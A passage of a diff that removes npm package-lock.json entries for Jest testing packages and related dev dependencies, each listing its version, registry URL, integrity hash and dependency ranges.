|| ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": 